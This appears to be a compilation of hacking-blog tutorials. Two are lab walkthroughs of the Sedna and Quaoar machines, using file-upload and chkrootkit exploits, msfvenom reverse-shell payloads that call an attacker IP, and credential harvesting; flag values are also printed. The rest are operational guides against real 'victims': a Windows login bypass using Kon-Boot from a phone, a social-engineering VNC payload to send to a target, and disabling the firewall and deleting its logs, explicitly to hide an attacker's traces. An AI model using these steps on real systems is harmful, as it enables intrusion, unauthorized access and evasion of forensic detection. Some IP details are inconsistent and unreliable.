Hack the Sedna VM (CTF Challenge)

Today we are going to solve another vunhub’s lab challenges “SEDNA” which contains 4 flags on this machine One for a shell, One for root access and Two for doing post exploitation on Sedna. For doing practice you can download it from here.

Let’s start!!!
Scan particular IP with version scan using Nmap tool as given in the image.
nmap -sV 192.168.0.113

Here it point up the open ports and running services on it. As shown port 22, 53, 80 and etc. are open.


Since port 80 is open therefore let explore target IP: 192.168.0.113 on the browser. From screenshot you can see I have not got any significant thing from here.

Shortly I had used nikto for entire scan and here you can see it has revealed license.txt from the highlighted text in the given screenshot.


Again I move towards browser to look at license.txt here I found the name of software “BUILDERENGINE” which might be used in this machine.


Then I enrolled into Google in hope to seek any exploit related to this software.
Luckily! the first link of the web page took me in the right direction here I found builder “engine 3.5.0 arbitrary file upload Exploit DB”.

When you will open this link you’ll notice an html code as shown in the given below screenshot. Copy this html code (..... ) and past it inside a text file.


Now inside your text file replace localhost from target IP http:// 192.168.0.113 and save with .html extension, I have saved it as file.html.


Above html code will create a form for file uploading; now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *.



Next I will upload my shell.php file on target machine and to perform this we need to open file.html file where it will permit you to browse shell.php after that once you have select your file for uploading click on send button.


Great!!! Our backdoor has uploaded successfully and from next screenshot you can observe I have obtained the path where my shell.php has been uploaded.


Now let’s dig up above highlighted path in the browser 192.168.0.113/file; so here again you can observe shell.php under index of files. When you will click on shell.php file you will get meterpreter session at the background of metasploit framework.


NICE!!! We have got victim’s meterpreter session; now time to capture the flags.


Meterpreter> cd/var/www

Meterpreter>ls
Meterpreter>cat flag.txt
Here we have got 1st flag successfully!


Now turn into another directory to find our next flag.
Meterpreter>cd/etc
Meterpreter> cd chkrootkit
Meterpreter>ls
Meterpreter>cat README
Under README file I came to know its version i.e. chkrootkit V.0.49


When I investigate more related to this then I found an exploit inside the metasploit.
Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.

Use exploit/unix/local/chkrootkit
Msf exploit (chkrootkit)>options
Msf exploit (chkrootkit)>set session1
Msf exploit (chkrootkit)>exploit


Here we have got command shell session victim with root privilege
Msf exploit (chkrootkit)>set session –I 2
ls
Cat flag.txt
Awesome!!!  We have captured 2nd flag also.
Now try to find out flag 3rd and 4th yourself to complete this task. GOOD LUCK!!!

Hack the Quaoar VM (CTF Challenge)

Once again we are with the vulnhub labs tutorial; this article is related to CTF lab where you will face three challenges to complete the task. This lab is pretty good for beginner as they have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box. You can download it from here.

LET’S BEGIN!!!

Now scan particular IP with version scan using Nmap tool as given in the image.
Nmap –sV 192.168.0.122

Here it point up the open ports and running services on it. As shown port 22, 53, 80, 445 and etc. are open.


Since port 80 is open therefore let explore target IP: 192.168.1.122 on the browser. From screenshot you can see I have not got any remarkable thing from here.


Later I had used nikto for complete scan and here you can see it has shown robots.txt contains two entries from the highlighted text in the given screenshot.


Again I move towards browser to explore roborts.txt here I found wordpress as one of the entry in it.


Further I look around following path: 192.168.0.122/wordpress in browser where I found a wordpress administrator console.


To breach administrator console of the wordpress we can use WPscan tool; now type following command to start wpsan enumeration.

Wpscan –url http://192.168.0.122/wordpress/ --enumerate u


At last I have received two users name from it scanning result, now use admin credential for login inside the wordpress


Accordingly under admin console we can upload any theme, taking advantage of admin’s right we will try to upload malicious script to achieve reverse connection from victim’s system. Now use msfvenom to generate malicious PHP script and type following command.

Msfenom –p php/meterpreter/reverse_tcp lhost=192.168.0.122 lport=4444 –f raw
 From screenshot you can read the generated PHP script, at this instant we need to copy the text from *further we will past it inside wordpress template as a new theme.


Now past above copied PHP text * here as new theme under selected 404.php template.


On other hand Load metasploit framework and start multi/handler


When you will execute your uploaded theme in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.


Here form screenshot you can see through meterpreter we have access victim’s shell.
Meterpreter> sysinfo
Meterpreter>shell

Echo “import pty; pty.spawn(‘/bin/bash)” > /tmp/asdf.py python .tmp/asdf.py

 Hence our first task is completed!!


Now type following command to obtain flag:-
Cd /home
Ls
Cd wpadmin
Ls
Cat flag.txt
2bafe61f03117ac66a73c3c514de796e (1st flag)


Now dig up more to achieve next flag so that we can complete second challenge also.
Ls
Cd www
Cd wordpress
Ls
Cat wp-config.php


Wp-config.php file helps me in achieving second task of this lab this file contains MYSQL Setting where I found credential for user root. If you will notice given below screenshot you can also read the username as well as its password (root: rootpassword)


Now try to login for root privilege by typing following
Su
Roo password


Great!!! We have completed second challenge also.
Cd root
Ls
Cat flaf.txt
8e3f9ec016e3598c5eec11fd3d73f6fb (2nd flag)

After many efforts I enrolled in etc where I found one more directory cron.d then I penetrate more inside and luckily capture third flag also and beat all three challenges.
Cd cron.d
Ls
cat php5
d46795f84148fd338603d0d6a9dbf8de (3rd flag)

Boo-yah!  We have successfully captured all 3 flags.

Bypass Windows Login Password using Android Phone with DriveDroid

Drive Droid is an Android application that allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go... without the need to burn different CDs or USB pen drives.

Drive Droid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone. You can also create USB-images which allow you to have a blank USB-drive where you can store files in. Blank images also allow you to use tools on your PC to burn images to the drive and create a bootable USB disk that way.

You can manually download it from google playstore.
Note: need root privilegde means you need rooted phone.

Let’s start!!!

Install DriveDroid app on your smartphone and run the application.


Click on plus sign at the lower right corner to add any iso image file.


Under preference here we need to select image directories so that we can browse konboot iso image file.


Further it will move into internal storage to let you choose your iso file, I have opt for konboot.iso and click on select (Please note that the kon-bootCD.iso file should exist on your phone)


Selected the koonboot iso file and it will get mounted


Tap on the mounted file and we can see three boot options as shown in the figure below Select the third option of CD-ROM and connect the smart phone with the system and reboot the system


Now plug the USB cable between phone and system for booting it from your phone and restart the system (pc) then continuously press function key of your desktop system.


Great!!! Successfully you will get administration console; now hit the enter button on the key board. This will bypass the admin console without entering password.

Capture VNC Session of Remote PC using Settoolkit

Today in this article we’ll try to compromise the target through VNC payload attack using very simple method for beginners. In this tutorial they’ll learn how to create a VNC payload using set tool kit and try to achieve VNC shell of victim’s PC.
Let’s Start!!!

Application > social engineering toolkit


A terminal will launch with set tool kit wizard here select first option to start social engineering attacks.
Type 1

Now we have to select another option to choose any one attack among following. Select create a payload and listener.
Type 4

Here we will select our payload option since we are performing VNC attack therefore we need to go with third option for VNC payload.
Type 3


In next step it requires IP address for payload listener which is 192.168.0.104 (attacker’s IP) then after that it will ask to enter the port for reverse listener and that will be 4444.

Now it starts generating VNC payload and save that payload under heighted path.  Explore /root./set//payload.exe and send payload.exe to target.

Further it will ask to start payload listener type Y and hit enter which will start loading metasploit framework.


 Here it launches metasploit framework and start multi handler automatically; now once the victim click on payload.exe file sent by attacker, attacker will get victim’s VNC shell.


Wonderful!!!
Our VNC attack using set toolkit is successful and we received victim’s VNC shell on our system.

How to Delete Firewall Log in Remote PC using Metasploit

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.
First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall
Type dir to observe the present directory of firewall.
Dir


From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.
type pfirewall.log


So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.
To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.
Netsh firewall set opmode mode= DISABLE


Now type given below command to delete pfirewall.log
Del pfirewall.log


Now type given below command to verify pfirewall.log is still available or not in victim’s PC
type pfirewall.log